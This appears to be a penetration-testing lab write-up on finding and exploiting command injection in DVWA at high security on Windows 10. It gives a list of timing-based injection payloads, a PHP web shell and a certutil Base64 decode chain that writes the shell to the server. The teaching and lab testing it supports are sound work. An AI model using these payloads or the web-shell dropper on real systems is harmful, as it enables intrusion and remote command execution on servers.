Command injection to web shell in DVWA (high security level) on Windows
Summary
This article describes an improved method for detecting command injection vulnerabilities on Windows. As a bonus, I demonstrate how to obfuscate PHP web shell payload that is not detected by the Windows Defender antivirus scanner and bypass the target application input validation restrictions.
We will use the Damn Vulnerable Web Application (DVWA) Command Injection challenge with the security level set to “High”. The target server is running Windows 10 with Windows Defender and Windows Firewall activated. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.
Disclaimer
This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Why this blog?
There is a lot of online information about different payloads that can be used to detect command line injection. The most notable is the PayloadsAllTheThings.This collection is really fantastic, it provides wordlists with a variety of payloads for non-blind and blind command injection.
However, you can significantly reduce your payload list by only focussing on blind command injection. After all, these payloads will work in a non-blind command injection context as well. Also, should create separate payload lists for Windows and for Linux. It doesn’t make sense to run Windows payloads on a Linux target. Additionally, we will not use payloads that are based on out-of-band technologies. These payloads require outbound connections. Outbound connections are not always possible, you should never rely on this. Finally, we only use binaries in our payloads that we are sure are present on the target system. In this case, we’re talking about binaries that ship with the operating system, such as powershell.exe or ping.exe.
In our approach, we will use the target server response time to determine if a command injection vulnerability exists. We will do that by appending different payloads to the vulnerable parameter, which causes controlled server response delays.
We will use the Damn Vulnerable Web Application (DVWA) command injection challenge with the security level set to high. When the security level is set to “high”, the web server performs extensive input validation, filtering out many characters.
Using the DVWA with the security level set to high, our goal is to find the command injection vulnerability with our specific crafted payload list for. Also, once we find the vulnerability, we will exploit it into a web shell.
Lab environment
This POC consists of 2 machines: an attacker machine (Kali Linux, 192.168.62.187) and a vulnerable Windows web server (Windows 10, 192.168.62.165):
Kali 64-bit [Version 24.2]
- IP-Address: 192.168.62.187
DVWA Windows 10
- IP-Address: 192.168.62.165
- Software: Xampp for Windows
- DVWA vulnerable web server (https://github.com/digininja/DVWA).
- Windows 10 Professional [Version 10.0.19045.4780]
- Windows Defender realtime scanning on
- Local Firewall all profiles on
I will not explain how install a DVWA web server on Xampp. The following installation process walkthrough is available: https://www.linkedin.com/pulse/how-setup-dvwa-windows-10-using-xampp-shubham-yadav/.
Part 1: Detect command Injection vulnerability on DVWA Windows (Security level=High)
Attack context:
· Target OS: Windows
· DVWA Security level: High
· Vulnerable web site: http://192.168.62.165/dvwa/vulnerabilities/exec/
Our target server is the Windows 10 with Xampp implementation of DVWA with the security level set to High. Also, the Windows Defender and Windows Firewall are functional and running.
Let’s start the command line injection with normal user behaviour when the DVWA Security level is set to “High”
1. Performed against vulnerable web server, Windows DVWA.
Set the DVWA security level to “High”.
2. Performed against vulnerable web server, Windows DVWA.
Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite Chromium integrated browser). Browse to the DVWA Command Injection site (http://192.168.62.165/dvwa/vulnerabilities/exec/).
Perform the ’ping a device’ function and ping the loopback address or localhost.
The TTL value (128) tells us it’s a Windows web server. Four ICMP packets are sent.
Next, let’s look at the HTTP traffic intercepted by Burp Suite. Find the request from step 1 in the Burp proxy history. As you can see, the target application uses the POST parameter “ip”.
Before building the payload list, we can try using the argument insertion technique. Normal use of this function will generate four ICMP packets, so the default Windows ping.exe configuration may be used without any additional arguments.
However, you can also put arguments before the IP address, for example “ping.exe -n 8 127.0.0.1” or “ping.exe /n 8 127.0.0.1” to try sending 8 ICMP packets.
3. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Put the ‘Number of echo requests to send’ argument before the ip-address. Try using ‘-n 8’ and ‘/n 8’.
The payload ‘/n 8 127.0.0.1’ resulted in 8 packets sent. We have confirmed that command line injection is possible!
We still need to find a working command separator to add our reverse shell payload.
We will use latency to find a working command separator. In this case, we add various Windows payloads to the POST IP parameter, which causes controlled server response delays. To do this we can use the “ping.exe” tool and PowerShell’s “Start-Sleep” command. The ping.exe tool is present in all versions of Windows. The process of “pinging a device” takes about 4 seconds (4 packets), so we will need to use a different latency payload. In this PoC we will use a 7 second latency payload, which can be achieved using the commands ‘ping /n 8 localhost’ and ‘powershell -c “Start-Sleep 7”’. The command injection vulnerability is detected when:
- The server response time is 11 seconds (both the first and second command are executed).
- The server response time is 7 seconds (only the second command is executed).
4. Performed on Kali Linux.
Create a Windows payload list that includes command “sleep 7”. Open a text editor and copy and paste the payloads below:
&powershell -c "Start-Sleep 7"
&&powershell -c "Start-Sleep 7"
|powershell -c "Start-Sleep 7"
FAIL||powershell -c "Start-Sleep 7"
FAIL|powershell -c "Start-Sleep 7"
%00 powershell -c "Start-Sleep 7"
&powershell /c "Start-Sleep 7"
&&powershell /c "Start-Sleep 7"
|powershell /c "Start-Sleep 7"
FAIL||powershell /c "Start-Sleep 7"
FAIL|powershell /c "Start-Sleep 7"
;Start-Sleep 7
%00 powershell /c "Start-Sleep 7"
&powershell -c "sleep 7"
&&powershell -c "sleep 7"
|powershell -c "sleep 7"
FAIL||powershell -c "sleep 7"
FAIL|powershell -c "sleep 7"
%00 powershell -c "sleep 7"
&powershell /c "sleep 7"
&&powershell /c "sleep 7"
|powershell /c "sleep 7"
FAIL||powershell /c "sleep 7"
FAIL|powershell /c "sleep 7"
%00 powershell /c "sleep 7"
&powershell -c "$i=7; sleep $i"
&&powershell -c "$i=7; sleep $i"
|powershell -c "$i=7; sleep $i"
FAIL||powershell -c "$i=7; sleep $i"
FAIL|powershell -c "$i=7; sleep $i"
%00powershell -c "$i=7; sleep $i"
&powershell /c "$i=7; sleep $i"
&&powershell /c "$i=7; sleep $i"
|powershell /c "$i=7; sleep $i"
FAIL||powershell /c "$i=7; sleep $i"
FAIL|powershell /c "$i=7; sleep $i"
%00 powershell /c "$i=7; sleep $i"
;Start-Sleep 7
'sleep 7
&ping -n 8 127.0.0.1
&&ping -n 8 127.0.0.1
|ping -n 8 127.0.0.1
FAIL||ping -n 8 127.0.0.1
FAIL|ping -n 8 127.0.0.1
;ping /n 8 127.0.0.1
&ping /n 8 127.0.0.1
&&ping /n 8 127.0.0.1
|ping /n 8 127.0.0.1
FAIL||ping /n 8 127.0.0.1
FAIL|ping /n 8 127.0.0.1
;ping /n 8 127.0.0.15. Performed on Kali Linux (DVWA should be at Security level=High).
Send the request from step 1 to the Burp Intruder. Configure the Intruder as follows:
Positions tab
- Type Sniper
- Set a position (for sleep payloads) after the valid value 127.0.0.1
Payloads tab
- Type Simple List: paste the ‘sleep 7’ payloads from step 3
Resource Pool tab
- Set maximum concurrent requests on 4
Start the attack.
6. Performed on Kali Linux (DVWA should be at Security level=High).
Analyze the attack results from step 4
We are lucky. We have four payloads that result in a server response time of 7 seconds (|ping -n 8 127.0.0.1 was a false positive). These are:
|powershell /c “sleep 7”
FAIL|powershell /c “sleep 7”
|ping /n 8 127.0.0.1
FAIL|ping /n 8 127.0.0.1
Part 2: Exploitation Windows DVWA to web shell (Security level=High)
Exploitation of the DVWA with security level set to High is difficult, but not impossible. Many special characters are filtered, such as hyphen ‘-‘, brackets ‘()’, dollar sign ‘$’, ampersand ‘&’, backtick ‘`’ and the semicolon ‘;’. Also, are target server did not ship with binaries like netcat (nc.exe) of wget.exe .
Fortunately, we can use the forward slash ‘/‘. This will enable us to use the certutil.exe tool with the /decode argument. You can use certutil.exe to decode Base64 encoded payload. In that way, we can bypass the character filter restrictions. Also, with a web shell we don’t rely on outbound access from the target server.
The command “sleep 7” was executed. Instead of the sleep command, we will add other payload (base64 encoded PHP web shell) after the pipe character ‘|’.
127.0.0.1|<paste payload here>
7. Performed on Kali Linux.
Generate a Base64 encoded string from the standard PHP web shell.
echo '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>'| base64 -w 0 | tr -d '\n\r'
We can use the following Base64 code in our payload:
PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUWyJjbWQiXSkpe2VjaG8gIjxwcmU+IjskY21kID0gKCRfUkVRVUVTVFsiY21kIl0pO3N5c3RlbSgkY21kKTtlY2hvICI8L3ByZT4iO2RpZTt9Pz4K
Note: if you are dealing with a GET request (DVWA uses POST requests) you need to URL encode the “+” character in the Base64 result. In that case, you can use the following command:
echo '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>'| base64 -w 0 | tr -d '\n\r' | sed -e 's/+/%2B/g'8. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Use the Base64 encoded payload (in a browser) with command injection vulnerability.
127.0.0.1|echo [paste here the Base64 code]>b64.txt|certutil /f /decode b64.txt web_shell.php
Our final payload:
127.0.0.1|echo PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUWyJjbWQiXSkpe2VjaG8gIjxwcmU+IjskY21kID0gKCRfUkVRVUVTVFsiY21kIl0pO3N5c3RlbSgkY21kKTtlY2hvICI8L3ByZT4iO2RpZTt9Pz4K>b64.txt|certutil /f /decode b64.txt web_shell.php
9. Performed against vulnerable web server, Windows DVWA (Security Level=High).
Test the web shell. Navigate to http://192.168.62.165/dvwa/vulnerabilities/exec/web_shell.php?cmd=dir
We did it! We found our command injection vulnerability and successfully exploited it into a PHP web shell.
Mitigations
The best way to prevent operating system command injection vulnerabilities is to never perform operating system commands from application layer code.
If you need to invoke operating system commands with user-supplied input, you must perform strong input validation.
References
https://github.com/digininja/DVWA
https://portswigger.net/web-security/os-command-injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
